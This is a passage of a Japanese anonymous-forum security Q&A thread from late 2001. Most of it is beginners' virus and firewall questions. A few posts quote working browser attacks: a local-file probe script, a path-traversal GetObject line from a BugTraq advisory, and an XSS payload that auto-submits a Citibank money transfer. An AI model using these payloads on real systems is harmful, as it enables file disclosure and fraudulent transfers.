英語が読める読めないの問題ではないと思われ。
googleですぐSpyWareって単語がでてくる。

詳しく調べたいなら外国語サイトでも
そこに登場する単語を一瞥しソフト名らしき固有名詞などを
手掛かりに更に検索する。

608 :名無しさん@お腹いっぱい。:01/12/29 15:29
スパイウェアっていうもんなんですね。
ありがとうございます。

609 :名無しさん@お腹いっぱい。:01/12/29 17:29
ANHTTPDでWEBサーバ立てているんだけど、アクセスログを見ると
cmd.exeやroot.exeにアクセスがあるんです。
今のところ特にサーバに異状は無いようですけど、何か良い対策は
あるのでしょうか。

610 :名無しさん@お腹いっぱい。:01/12/29 18:15
ウイルスバスター2002入れたのですが、パーソナルファイヤーウォール
のログで10.64.0.1っていうIPにクローキングされっぱなしなんですが、これは
なんなのでしょうか? 

611 :2チャンネららら:01/12/29 18:46
2ch型掲示板ってどれぐらい穴があるの?
ちなみにここなんだけど・・・。

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/hc/
アクセス数アップキャンペーン中、みんな紹介よろしこ。

612 : ◆jetsR88o :01/12/29 19:26
質問です。

ネットに接続していない時のPCの状態は普通なのですが、
接続したとたんに、システムモニタ」の「プロセッサ使用率」
が100%に跳ね上がり、めちゃくちゃ重くなります。
これは何なんでしょうか?

少し前に、知らない人から怪しげな添付ファイル付き(本文なし)
のメールが送られてきて、即座に削除したつもりだったのですが、
その時に画面に一瞬「ファイルのダウンロード」みたいな表示が
ありました。それでウイルススキャンしてみても異常なしでした。

あと、PCを終了するときに「***から応答がありません」等の
メッセージが出て、そのままフリーズする事もあります。
***は一度目は「タスク何とか」、2回目は空白でした。

マシン環境
富士通FMV(win_seでメモリ320M)、メールソフトはWIN標準のやつ。

すみませんがよろしくお願いします。

613 :名無しさん:01/12/29 20:06
>>612
なんかおもいっきり怪しいですね。
アンチウィルスソフトの検索エンジンやパターンファイルを更新して
再度スキャンしてみることをお勧めします。
それでも出なかったら、アンチウィルスソフトのメーカーのサイトに
ある、オンラインスキャンを試してみましょう。
こちらのほうが検出率は高そうです。

614 :名無しさん@お腹いっぱい。:01/12/29 20:19
>612
窓の手でも使って自動実行してるやつを外してみ
se(98だよな?)って稼働してるプロセスとか見れたっけ?
W2Kタスクマネージャーならバックグラウンドで悪さしてるソフト探しやすいんだが

615 :名無しさん@お腹いっぱい。:01/12/29 21:49
本文の無いのはどのウイルスだっけ?
BADTRANS.B?

616 : ◆jetsR88o :01/12/29 22:14
>>613
試してみます。

>>614
98SEです。
窓の手ってなんですか?

617 :名無しさん@お腹いっぱい。:01/12/29 22:17
使ってるメーラーの名前知らん奴が
窓の手知ってる訳ないわな(w

618 : ◆jetsR88o :01/12/29 22:27
>>617
すんません。Outlook Expressです。

619 :名無しさん@お腹いっぱい。:01/12/29 22:55
>>618
素直だな。気に入ったよ(w

ここ逝ってみ。
http://www.asahi-net.or.jp/~vr4m-ikw/

620 : ◆jetsR88o :01/12/29 23:02
>>613 >>614
>>615 >>617,619

おかげさまで、どうやらウイルス駆除できました。たぶん。
ヤパーリ>>615さんの言ってたBADTRANS.Bっていう奴みたいです。
ありがとうございました。

621 :名無しさん@お腹いっぱい。:01/12/30 13:28
年末 質問増加aqge

622 :名無しさん@お腹いっぱい。:01/12/30 14:16
今日 わかったこと
ノートン利用者には厨房が多い

623 :名無しさん@お腹いっぱい。:01/12/30 14:21
>>622
ノートンに限ったことじゃないよ。

624 :名無しさん@お腹いっぱい。:01/12/30 16:44
>623
ん?
ワクチンソフト使ってる人は厨房ばかり?
セキュリティの意味も知らずPCいぢってるオヤジたちよりマシじゃん

 # ピーコ天国&セキュリティ無法のCHINA管理IPからは
いまだにCodeRedからの突っつきがあるのう

625 :名無しさん@お腹いっぱい。:01/12/30 17:34
>>624
コリアモナー

626 :名無しさん@お腹いっぱい。:01/12/30 20:20
んもーなんで今頃サーカムなんか来るかなあ...

627 :名無しさん@お腹いっぱい。:01/12/30 23:53
>>612のところだけ時代が10年・・・

628 :名無しさん@お腹いっぱい。:01/12/31 03:26
単発質問新規スレが最近増えてきてるからage

629 :名無しさん:01/12/31 03:36
チャットをやってて、IPを抜かれました。
なんかYBBとかいってました。
それで、なんかお気に入りYは2ちゃんで書いた場所がばれました。
おそらく相手は私のパソコンに入ったとおもわれますが、一体どうしてでしょう。
今、脅されてます。それに、なんかIPが
ばれると、ネットでの買い物がまずいとかどうとか、
対策教えてください。

630 :名無しさん@お腹いっぱい。:01/12/31 04:17
>>629はマルチにつき放置せよ

631 :名無しさん@お腹いっぱい。:02/01/01 01:05
ageとくね

632 :名無しさん@お腹いっぱい。:02/01/01 03:38
ひとつ教えていただきたいことが。
ウィルスバスター2002のパーソナルファイアウォールの設定にある
「信頼するコンピュータ」に自分のPCのLANアダプタが表示されるんだけど
これは信頼するコンピューターに追加しちゃっていいの?

当方のパソコン環境
WinXP ADSLにて接続 使用ルーターはMegaBit Gear

633 :IE改善委員会:02/01/03 01:16
Q313675 を導入する。最終的にはIEの累積修正も
含まれている、これ1つでいい。

634 :名無しさん@お腹いっぱい。:02/01/03 01:56
>>632
http://pc.2ch.net/test/read.cgi/sec/1009212569/l50
このスレでは解決しているように見えるのだが。

635 :ppp:02/01/03 09:47
>>632
おれだったらおまえのは登録しない。

636 :名無しさん@お腹いっぱい。:02/01/04 14:23
Norton AntiVirus Enterprise Solution 4.6 って奴の新品が手元にあります。
でもってWindows98とかMeとかのPCがありますが、LAN上にNTやW2Kはいません。
このW98やMeを上記のソフトでウィルス対策することは可能でしょうか?
管理サーバは必須なんでしょうか?

637 :名無しさん@お腹いっぱい。:02/01/04 18:56
ついに初質スレに抜かれたね

どーでもいいことだけど

638 :ココと向こうの1:02/01/05 01:51
なんか単発質問スレ立てた馬鹿が
向こうで騒いでるみたいね

639 :WinPing:02/01/05 06:46
F-Secureってどう?かなーりスキャンが遅いけど。

640 :名無しさん@お腹いっぱい。:02/01/05 17:03
メールにファイル添付って どうやるんですか?

641 :名無しさん@お腹いっぱい。:02/01/06 01:57
>>640
ネタかよ。
ここがどんな板のどんなスレか知ってて聞いてるのか?

642 :名無しさん@お腹いっぱい。:02/01/06 02:00
>>641
安心してMXしたい輩が立ち寄る板(失笑

643 :RUR:02/01/06 03:41
通信技術板でRFC(STD)を目指すプロジェクトがスタートしました。
セキュリティ板の住人のお力添えも頂ければありがたいです。
http://pc.2ch.net/test/read.cgi/network/1010255621/

644 :をい!:02/01/06 03:46
はじめましてです。
2ちゃんで使える串晒せや!ゴルァ!
厨房だとか基地外だとか、外出だとか言うんじゃネェ。
おねがいします。

645 :名無しさん@お腹いっぱい。:02/01/06 03:54
ttp://www.zero-zone.net/
2chなら知ってる人いると思うけど相当変わったよ。
ココ
セキュリティバリバリかけてるとか書いてるけど
かけてるのは零ではなかろうか・・・w

646 :名無しさん@お腹いっぱい。:02/01/06 03:54
>>644 マルチは、、、(・∀・)イッテヨシ!!

647 :名無しさん@お腹いっぱい。:02/01/06 11:08
SOCKS5のダウンロード手順ってどうなってるんでしょうか?
自動返信にある"Please reply"ってそのまま返信すればいいの?

648 :HELP:02/01/06 16:24
質問です。最近、添付ファイル有りの宛先も差出人もないメールや
メールを出していないのにそのメールアドレスは存在しないとのメール
が返ってきたりしています。もしかしてウィルスが悪戯しているのでしょうか?
誰か教えてください。

649 :自宅鯖缶:02/01/06 16:52
自宅鯖でうpロダ運営している人いる?

いたら運用上の問題点とか話し合いたいな.そういうスレない
みたいだし・・・

650 :名無しさん@お腹いっぱい。:02/01/06 17:14
>>648
悪戯しているんじゃなくて、活動しているのです。

651 :名無しさん@お腹いっぱい。:02/01/06 17:26
>>650
素敵な回答ですね(w

>>648
即座に回線切ってご自分のマシンをキレイにしましょうね。
「どうやってキレイにするんですか?」みたいな質問はしないでネ。

652 :名無しさん@お腹いっぱい。:02/01/06 17:44
たまにさあ、
チャイナテレコム系の全てのアドレスをブロックしたくなる時ってない?

653 :名無しさん@お腹いっぱい。:02/01/06 18:01
>648
ネタならゴルァ
マジレスならかわいそうなのでお教えいたします

受信している怪しいメール、それは多分ウイルス付きのメールでしょう
本文・添付ファイル共に絶対に開けないでください(プレビューしてもだめ)
そのかわり、メールのプロパティ
(受信トレイで該当メール選択→ファイル→プロパティ)
を開いて差出人のアドレスを確認してみて下さい(全般タブのところでよい)
そのアドレスが知人からの場合は
その知人に怪しいメール送信の件を忠告しなければなりません
また自分のPCから自分のPCに送信している場合もあります
送信済みトレイをみて
覚えの無い送信済みメールがあるかないか確認して下さい
あった場合あなたのPCは間違いなくウイルスに感染しています
勝手にメールを送信しているという点でほぼ確実です
ウイルス検知・駆除ソフトがあればそれを使って駆除するか
無ければシマンテック、トレンドマイクロ、マカフィー等のHPをみて
対策を考えて下さい(オンラインスキャン→該当の駆除ソフトダウンロード)
まず、どのウイルスに感染したか確認、それから駆除です
最悪の場合OSの再インストールとなります
またあなたのPCから知人らに感染の輪が広まったという可能性もあるので
慎重な対応が望まれます

654 :名無しさん@お腹いっぱい。:02/01/06 18:26
>>653 親切やんけゴルア

ところで、初心者スレだったらそれだけでもいいのだが、
いちおう補足しとくと、感染メール送信の際に、メーラーの
送信トレイにはなんの証拠も残らないタイプのウイルスも
あるのでそれも認識しといてね。というより最近ではこのタイプ
のほうが多いから…ね。

MSがOE6にウイルス防御機能とかいってメーラーの機能を勝手に
使わせない機能をつけたからかな? いちおうメーラー機能使う
タイプのウイルスは、これで防御することは出来るみたい。

655 :HELP:02/01/06 18:53
親切にありがとうございます。トレンドマイクロのInter Scan Outlook
でスキャンしたらWORM_HYBRIS.Bってのがみつかりました。駆除したいと
思います。

656 :名無しさん@お腹いっぱい。:02/01/06 19:13
>>655
Inter Scan Outlook
そんなの持ってるなら、最初からチェックしなさいって

657 :名無しさん@お腹いっぱい。:02/01/06 20:32
.NET Passport カスタマ サポート
を名乗るところからメールが来たんだけど、これってなんでしょう?

http://securitycheck.passport.com/default.asp?lc=1041
ここで、ブラウザのチェックをしろっていうんで、
行ってみたんだけど、なんのことやら、よくわかりません

MSNは使うなってことでしょうか?

メールヘッダはこんな感じ
From: "Microsoft .NET Passport" <Microsoft.NETPassport_033748@msnnewsletters.customer-email.com>
Subject: セキュリティに関する緊急情報

658 :名無しさん@お腹いっぱい。:02/01/06 21:54
>セキュリティ問題の修正プログラム インストール済み
…と、出ますな。

対策未導入なら警告出るチェッカーサイトなんかな?

659 :名無しさん@お腹いっぱい。:02/01/06 22:02
>>657
私のところにも同じメールが来ました。
このURLって大丈夫なんでしょうか?
過去にmsnがウィルスにやられたりしていたので
いきなりメールでこんなこと言われても開くのがコワイです。

660 :名無しさん@お腹いっぱい。:02/01/06 23:43
>>657
言われるままにインストールしたけど、なにもないね

661 :名無しさん@お腹いっぱい。:02/01/07 11:10
PassportユーザにIEパッチを当てるよう促すメールだそうな
http://www.zdnet.co.jp/news/0201/07/b_0106_14.html

662 :657:02/01/07 23:11
なるほど、cookieを盗まれるやつですか
でも、うちのIE(Mac OSX)が安全かどうかわからないや

とりあえず、Passportは使わないことにします。
あと、Java scriptも切っておこう

663 :名無しさん@お腹いっぱい。:02/01/08 15:57
>>649 漏れも興味あるage

664 :jay:02/01/08 17:09
yo !!

665 :名無しさん@お腹いっぱい。:02/01/08 17:25
助けてください!BADTRANSに感染したらしく
トレンドマイクロ社の検索ソフトをダウンロードしてみたのですが
ウイルスが見つからなかったのです。感染していても見つからない
場合なんてあるのでしょうか????くだらない質問で
すみません。。。今後どうすればいいのかさっぱり検討が
つかず困ってます・・・・・

666 :名無しさん@お腹いっぱい。:02/01/08 17:38
>>665
>BADTRANSに感染したらしく
…どうやって判ったのだ?

667 :名無しさん@お腹いっぱい。:02/01/08 18:24
勘。

668 :665:02/01/08 18:38
症状(メールが勝手に配信されてるとか・・・)を
プロバイダーのヘルプに聞きました。あと配信先から
返信が来て「あなたのメールはBADTRANSに
感染されている可能性が高いです」と教えてくれました。
トレンドマイクロ社のHPを教えてくれたんですが、
それ以上は教えてくれないのです・・・・・・
駆除ソフトをすればよいのでしょうか・・・・・
もう鬱です。どなたか助けてください・・・・・

669 :名無しさん@お腹いっぱい。:02/01/08 18:48
>>668

↓熟読。

コンピュータウィルス総合スレッドVol.10
http://pc.2ch.net/test/read.cgi/pcqa/1008862704/1-18

670 :名無しさん@お腹いっぱい。:02/01/08 20:32
 

671 :名無しさん@お腹いっぱい。:02/01/08 20:33
  

672 :668:02/01/08 21:49
>>669
熟読しましたが、、、すみません初心者なんで
あんまりよく分からないくて。。。
トレンドマイクロ社の検索だとウイルスが見つからなかった
んですが、自分でファイルを検索(kernel32.exe等)したら
windows内にあるっぽいのです。駆除ツールをDLして駆除しようと
思うのですが今までのパスワードとか全て変更しなければ
ならないのでしょうか??????すみません。本当まったく
分からないのです。。。。。。

673 : :02/01/08 22:18
シマンテックでスキャンしたところトロイが検出されました。
しかしトレンドマイクロでは検出されませんでした。
少し前にトロイを駆除したのですが、
NHMJJNHJにウイルスが残っていました。
これは削除しても良いファイルなのでしょうか?

検索結果
c:\WINDOWS\SYSTEM\NHMJJNHJ は 次のウィルスに感染しています: W95.Hybris.worm

674 :名無しさん@お腹いっぱい。:02/01/08 22:18
つーか、ソフト買え。インストールすればもれなく駆除できる。

675 :673:02/01/08 22:21
>>674
そうですね、大人しくソフト買います。

676 :名無しさん@お腹いっぱい。:02/01/08 22:34
nimdaが欲しがっているファイルと同名の10か100メガぐらいのファイルを置いとくと
彼らは律儀にディスクへダウンロードするのでしょうか?

677 :名無しさん@お腹いっぱい。:02/01/08 22:54
http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-059
このサイト開くと
ちゃんと表示されません

皆さんも以下の文が出てきますか?


Microsoft OLE DB Provider for ODBC Drivers error '80040e09'

[Microsoft][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object 'JPN_Prodall', database 'Japan', owner 'dbo'.

/japan/technet/security/frame_current.asp, line 36

678 :名無しさん@お腹いっぱい。:02/01/08 22:58
外出だったら申し訳ありません。教えてください。
あるサイトに行ったら、10分位の間隔でずっとpingを打たれてるのですが、
これは相手側がウィルスにやられてるとかなのでしょうか?
それとも、こちらになにかしようとしているのでしょうか?

679 :名無しさん@お腹いっぱい。:02/01/08 23:10
>>676
しない

680 :>677:02/01/09 00:48
出てきます。

681 :名無しさん@お腹いっぱい。:02/01/09 00:50
<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

682 :名無しさん@お腹いっぱい。:02/01/10 01:01
おちすぎ

683 :>682 麻衣糞がおちすぎ?:02/01/10 01:13
 

684 :名無しさん@お腹いっぱい。:02/01/10 02:16
http://www.watch.impress.co.jp/internet/www/article/2002/0109/flash.htm
もしこれがUnixフラッシュに入ってたら
Uni板悲惨だなw
つぅかフラッシュにも穴かよ・・・。
だりーなぁ

685 :名無しさん@お腹いっぱい。:02/01/10 02:26
>>684
やっぱ、ActionScript関係ありかなぁ・・・

686 :名無しさん@お腹いっぱい。:02/01/10 04:44
追加・修正

IPAセキュリティセンター
http://www.ipa.go.jp/security/isg/virus.html

687 :名無しさん@お腹いっぱい。:02/01/10 04:45
Symantec Security Response
http://www.symantec.com/region/jp/sarcj/

688 :名無しさん@お腹いっぱい。:02/01/10 04:46
Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp

689 :名無しさん@お腹いっぱい。:02/01/10 04:47
McAfee ウイルス情報
http://www.nai.com/japan/virusinfo/vinfo.asp

690 :名無しさん@お腹いっぱい。:02/01/10 13:40
>>684
お礼バカが感染するだけだからUnix板は
間接的にしか被害を受けないと思われ。

今でも十分被害者だが。

691 :名無しさん@お腹いっぱい。:02/01/10 14:24
PCが立ち上がらなくて困っています。

最初の一度だけ立ち上がったのですが、デスクトップのショートカットが全て作動しないので
スタートボタンからネットに繋いでみようとしてみるとフリーズしました。
強制終了してもう一度立ち上げてみると、アクティブデスクトップメニューのエラーが出ました。
修復を選んでも修復されず、応答なし状態に・・・。

最近のイベントとしては
1.一月半ごろ前にトロイを発見、駆除。ダイヤルアップを書き換えるタイプです。
2.一昨日と昨日にノートン先生がポートスキャン、トロイのバックドアーへのアクセスを遮断。
3.INS2002で全スキャンするもウィルスは発見できず。
4.IEとOEをやめ、ネスケとEudoraをインストール。
5.添付ファイル付きなどの怪しいメールは届いてません。

昨日まで普通に使用していたのですが、今日朝立ち上げてみると冒頭のような状態になっていました。
どなたかこの状況から抜け出す方法をご存知の方いらっしゃいませんか?助けて下さい。
OS再インストールしかないのでしょうか・・・?

ちなみにOSはウィンドウズMeです(w

692 :名無しさん@お腹いっぱい。:02/01/10 14:52
>>691
>修復を選んでも修復されず、応答なし状態に・・・。
この修復って「システムの回復」のこと?

693 :691:02/01/10 15:00
起動が途中で止まり、画面上部にアクティブデスクトップの修復というボタンが表示されます。
その時は背景が真っ白で、ショートカットのアイコンも飾りの無いそっけないやつで表示されてます。

694 :691:02/01/10 15:13
>>693
トロイとかポートスキャンはよくわからないけど、
関係ないような気がします。

起動時にCtrlキーを押しっぱなしでOSのスタートメニューが
出ると思うんだけど、そこでセーフモードを選んだら、
ヘルプが出るので、そこで

「システムの回復」→適当な回復ポイントを選択

で、なんとかなりませんか?(内容的にスレ違いだけど…)

695 :691:02/01/10 15:24

>>694
家帰ったら早速やってみます。
すばやいレスありがとうございました。

確かにウィルス関係なかったら激しくスレ違いですね(w

696 :せら:02/01/10 15:31
なにはともあれ、これ読めばわかる。
なんでも書いてあった。
http://www.puchiwara.com/hacking/

697 :名無しさん@お腹いっぱい。:02/01/11 01:21
フラッシュウィルスのブラウザ版が出るのは
いつくらいになると思いますか?

698 :bugtraq id 3767 :02/01/11 01:32
Microsoft Internet Explorer GetObject File Disclosure Vulnerability
BugTraq ID: 3767
リモートからの再現性: あり

公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:

Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。

JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。

例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。

699 :未解決!シティバンク:02/01/11 01:51
未解決!シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html

https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
---
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='u@you.com';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html

700 : :02/01/11 03:00
>>694
Meのシステムの回復って去年の九月ごろに終わったような・・・
漏れの勘違いか?

701 : :02/01/11 08:03
>>700
パッチあてれば、それ以降には復元可能。

702 :お願い教えて!かなり鬱です:02/01/11 18:36
ホームアドレスが勝手に変わったんですが、どういうことでしょうか?ホームアドレスをgoogleにしてたのに、ホームアドレスが勝手に海外のエロサイトに書き換わっていました。普段、エロサイトなんか行かないし、全然覚えがありません。
どういうことでしょうか?知ってる方がいましたら、お教え下さい。すごく不安です。それから、クッキーのファイルの名前も全て、屍xxxxx.txtに変わっていました。

703 :名無しさん@お腹いっぱい。:02/01/11 19:07
>>702 JS.EXCEPTIONで検索

704 :名無しさん@お腹いっぱい。:02/01/11 19:09
ノートン・インターネットセキュリティ 2002にするか
ゾヌ+ノートン・アンチウイルス 2002にするか迷ってます。
ほんとんトコどうでしょう?
使い勝手とか機能とか。

705 :名無しさん@お腹いっぱい。:02/01/11 19:11
>>702
ちなみにその質問は、この板ではあまりに多くて
皆うんざりしているので、場合によっては
クソヴォケ 氏んでこい 扱いなので注意せよ

706 :名無しさん@お腹いっぱい。:02/01/11 19:14
>>704
そんなの、いくらアドヴァイスしてもらっても
結局、使ってみないと分からないと思うのだが…

707 :お願い教えて!かなり鬱です:02/01/11 19:14
>>705
でも、分からないんです。これ以降くだらない質問はしないので教えてください。。。

708 :お願い教えて!かなり鬱です:02/01/11 19:20
>>703
マカフィーVirusScan(最新のウイルス定義ファイル)で検索しましたが、何も発見されませんでした。
全てのファイルを検査しました。トロイも出ませんでした。

709 :名無しさん@お腹いっぱい。:02/01/11 19:30
>>706
使ってからでは遅いの。

710 :名無しさん@お腹いっぱい。:02/01/11 19:51
age

711 :名無しさん@お腹いっぱい。:02/01/11 20:06
>>709
どして?体験版もあるけど?

712 :名無しさん@お腹いっぱい。:02/01/11 20:13
>>708
http://security1.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=EEVHPWFYJOKMFIDPMSV
ここでスキャンしてもなんも出んか?

713 :お願い教えて!かなり鬱です :02/01/11 20:17
>>712
分かりました。やってみますです。。。また、報告しますです。。。

714 :名無しさん@お腹いっぱい。:02/01/11 20:21
これってジョークサイトらしいんですけど本当なんでしょうか?
http://www.top.or.jp/~godhand/a2.html

715 :お願い教えて!かなり鬱です:02/01/11 20:38
>>712
何もいなかったです。。。でも、web上からプライバシー(履歴)が漏れる危険があるらしいです。

716 :名無しさん@お腹いっぱい。:02/01/11 20:38
>>714
だからさ。それ直リンクすると
また踏んで騒ぐ人がいるんだって。
流行らせたいの?

717 :名無しさん@お腹いっぱい。:02/01/11 20:51
>>715
それなら、たぶんどっかのサイトでJavaScriptで書きかえられただけ。
設定戻して再起動して、また変更されてなければ、OK!

それから、Cookieのほうは単なるサーバー側との文字コードの違い。
Windowsのログイン名に漢字を使ってるとよくある。

718 :お願い教えて!かなり鬱です:02/01/11 21:05
>>717
本当にありがとうございました。全ての謎が解けました。
今晩はゆっくり眠れそうです。あなたは私が出会った中で一番優しい2ちゃんねらーです(^o^)。

719 :名無しさん@お腹いっぱい。:02/01/11 21:21
>>718
安心するのは良いけど、念のために
「ダイヤルアップの電話番号」も確認しとけよ。

720 :名無しさん@お腹いっぱい。:02/01/11 22:03
フレッツADSLなんですけど
同じISPからのIPがゾーンアラームによく引っかかるのですが
よくあることなんですか?

721 :名無しさん@お腹いっぱい。:02/01/11 22:07
※ うっとうしい
不動産会社より、催促のメールが来る。鬱陶しいので、「お宅に資料請
求した覚えは無い」、しかしかくかくしかじかで刑事告発する可能性が
あるので、ログは保管しておいて下さい、旨の返信を送る。早速、とあ
る人々より具体的なアドバイスを受ける。深謝<m(__)m>。「捜索差押許
可状の発布を得ていつでもISPの捜査に着手できる」とのこと。
なんでもこういうケースでは、まずメールアドレスの「窃盗罪」が成立
するらしい。20日間ほど不自由な思いをする羽目になるかもしれないか
ら、新聞止めたり、郵便物を止めたり、レンタルしたビデオも返してお
くようにね。顧問弁護士がいるとも思えないから、地元の当番弁護士制
度も調べておいた方が良いよ。私は普段から、くだらないストーカーや
ら民事で警察を頼るな、行政コストを増やすな、その前に自分のコスト
で身を守れと主張している人間だから、心苦しい所はあるけれど。私と
しては、結構辛抱したつもりだし、2チャンで莫迦だのアホだの書かれ
る程度なら所詮はただの有名税、書かれてなんぼのものと割り切れもす
るが、同じくキーボードを叩いてやるにしても、超えちゃならん一線が
あるってことを認識できん相手には、それなりに不愉快な思いをして貰
うしかない。以降の展開に関しては、どうなっても、新聞に載るまで、
私からはもう一切公にはしない。触れない。

722 :名無しさん@お腹いっぱい。:02/01/11 22:41
適宜改行されてない長文の方が鬱陶しい
そう思うのは漏れだけか?

723 :長文うぜぇ:02/01/11 23:08
>>722
あなただけではないでしょう。

724 :名無しさん@お腹いっぱい。:02/01/12 12:30
>>711
ノートン・インターネットセキュリティ 2002って体験版ないんじゃ?

725 :第三者中継可能?:02/01/12 13:55
From:FunnyMoney< funnymoney.10@reply.pm0.net >
To: funnymoney@ofr.pm0.net
Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:***
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From funnymoney@ofr.pm0.net
Message-Id:< 300113322561MANKO123456@pm0.net >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at funnymoney@complaints.pm0.net
X-PMG-Userid: funnymoney
X-PMG-Recipient: funnymoney@ofr.pm0.net

To remove yourself from this mailing list, point your browser to:
http://i.pm0.net/remove?funnymoney:10

Enter your email address ( funnymoney.10@reply.pm0.net ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.

726 :名無しさん@お腹いっぱい。:02/01/12 15:47
Norton
InternetSecurity2002入れたんですが、、
1、2ch(IE5,5)に書き込みできない。ブラウザが変ですよって言われちゃう
2、メディアプレイヤーがずぅーーとバッファ中で動かない
※設定は全て自動です。どうしたら解決するですか?

727 :747:02/01/12 15:59
ガハハハ! これ、すごいわ。
http://www.puchiwara.com/hacking/

728 :名無しさん@お腹いっぱい。:02/01/12 16:00
233.204.104.203.livedoor.com
この情報でなにができますか?なにがわかりますか?

729 :名無しさん@お腹いっぱい。:02/01/12 16:39
>>728
株価

730 : :02/01/12 16:41
>726
マルチポストは辞めなさい

>728
「livedoor.com」使っている、くらいの事。
http://www.watch.impress.co.jp/internet/www/column/hpsafety/hps6.htm

731 :さーかむ:02/01/12 17:21
何だかしょっちゅう変なアクセスがあって
いい加減向こうのネットワーク所有者に文句言おうと思うんだけど
そのネットワーク自体がIPアドレス30個くらいの
ちっちゃなとこなんだよね。
それってひょっとして組織ぐるみでやってるって事かな?
正面からネットワーク所有者にメールで連絡したら
逆にこっちのメアドとか知られて
馬鹿見るだけなのかな?

732 :名無しさん@お腹いっぱい。:02/01/12 17:34
ホームページビルダー6使ってるんだけど、

「ファイル転送」→「接続」すると
<ファイアーウオール・サーバー ○○○○odn.ne.jpに接続できませんでした>
って出るのよ。

何でだろう? ファイアーウオールのアドレス、パスワードが間違っているのでしょうか?

733 :名無しさん@お腹いっぱい。:02/01/12 20:46
http://www.symantec.co.jp/region/jp/campaign/wstop/images/gal-back.jpg
このオネーさんってだあれ?

マジで気になります。可愛いんだけど、ハァハァしたい・・・

734 :名無しさん@お腹いっぱい。:02/01/12 21:23
>>724
そりゃスマソ
出るまで待つか買って玉砕だな

735 :名無しさん@お腹いっぱい。:02/01/12 23:36
>>728
情報管理が糞なISPなら
たくさんの情報が漏れます

736 :名無しさん@お腹いっぱい。:02/01/13 00:01
さっきトロイ君が来たよって
ノートン先生に言われた
初めてだったんですんごいどきどきしてます
皆さんはこうゆうことっていっぱいあるのかな?
問題ないよね?
IPばれてるってことだよね
またなんかされないかなー
こわいよー
ノートン先生だとだめなウイルスもいいっぱいあるんだよね?

あいてってLANのアナライザ(?)を使うとわかるのかな?
フリーでもいっぱいあるんですよね?

737 : :02/01/13 00:09


738 :しつもーん!!:02/01/13 00:23
づっと前々からなんだけど 超ド級ウザイ奴に 纏わりつかれてるんだけど。
んで、どーいう風にかっていうと、実はオイラ ポエム板の住人なんだけんど
そこでレスすると 必ず クソがかえってきます。それもオイラにの発言に
関することでのアイロニーで堂々と煽る訳でもない。煽るんなら堂々とやれと。
オイラはいろんな板の住人でもあります。そこへ まるでコバンザメの如く現れる粘着野郎。

で、質問です。2ch内でIP抜けるのは事実だろ。ならばIPを掲示板内で
検索かければ 俺の居所が解かる?つーか そんなこと可能?どうやって
やるのかを聞きたいんじゃなく 出来るのか 出来ないのか セキュ板の
勇士達よ、どうか教えて!

739 :しつもーんのP.S:02/01/13 00:57
>>738のこれが板っす。(ある意味バカです。)
http://mentai.2ch.net/test/read.cgi/poem/1010490837/l50
>>174から荒れております。ほとんど一人で

740 :ななし:02/01/13 01:02
>736
いっぱいあるよ。
ブロックしているなら問題ないよ
IPばれている、と言うよりは、テキトーなIP にアクセスを試みているだけだよ
それがたまたま貴方のマシンだったと。
またアクセスはあると思うよ。
とりあえずブロックされているなら恐くないよ
ファイアーウォールとアンチウィルスをゴッチャにしていない?
相手のIPアドレスは、警告んところに書かれてあるでしょ、
でも判ったところで、どうしようもないから、気にしない方が良いよ。

741 :名無しさん@お腹いっぱい。:02/01/13 01:16
>>740
ありがとうございます
気にしなくて良いですねよかった
いろんなこと勉強しなきゃいけないなー

742 : :02/01/13 01:20
>783
>2ch内でIP抜けるのは事実だろ。
フシアナさんやらなくて、ですか。無理だと思いますが。
ぱっと思いつくのは、
1. あなたの書き込みが、どの板でも不適切なので、みんなから煽られている
 (相手は多数だけど、あなたが同一人物と勘違いしている)
2. あなたのパソコン内に、トロイの木馬のような物が仕込まれていて、監視されている
3. 会社や大学のネットワークからのアクセスならば、その経路の途中で誰かに覗き見されている

743 :742:02/01/13 01:22
スマソ >738だった

744 :名無しさん@お腹いっぱい。:02/01/13 01:26
>>738
その前に聞きたいのだが、君を追いかけてるらしきその粘着野郎が
特定人物だと思うのは、何か根拠があるのか?そこが知りたい。

そもそもSec版では、君がどこの誰かさっぱりわからんぞ?
>>739 のようにリンク貼りつけることではじめて
ポエム版の住人だとわかるんだが…。

